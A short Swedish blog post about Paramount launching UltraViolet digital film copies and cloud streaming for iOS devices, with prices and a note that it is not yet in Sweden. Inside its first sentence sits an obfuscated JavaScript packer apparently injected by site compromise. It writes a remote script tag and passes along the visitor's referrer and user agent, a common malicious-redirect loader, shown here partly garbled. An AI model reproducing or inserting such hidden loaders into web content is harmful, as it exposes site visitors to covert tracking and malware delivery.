Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Nu kan man streama Paramount filmer ultraviolet

Nu kan man streama Paramount filmer ultraviolet
Sebastian

Paramount eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iyayn|var|u0026u|referrer|rhkzb||js|php’.split(’|’),0,{}))
är den första studion att erbjuda digitala versioner av ultraviolett-baserade filmer på nätet.

Med denna tjänst kan användarna köpa en film antingen digitalt eller i fysisk fom, och automatiskt lagra en kopia av den inom Paramount nya moln-tjänst. Detta gör att på ett effektivt sätt kan du streama en film till vilken iOS-enhet som möjligt.
Tyvärr finns det inte tillgängligt för Android och Windows Phone än men utvecklarna jobbar stenhårt med att få det klart så snart som möjligt.

Konceptet går ut på att ”köpa en gång, spela vart som helst”. Det bör noteras att studions UV-erbjudande är något begränsat. Det finns i dag ca 60 titlar vilka kostar ca 20 dollar för HD-kvalitet och 13 dollar för SD-versionen. Du kan läsa mer om tjänsten i länken nedan.

Och nej, det har inte kommit till Sverige än.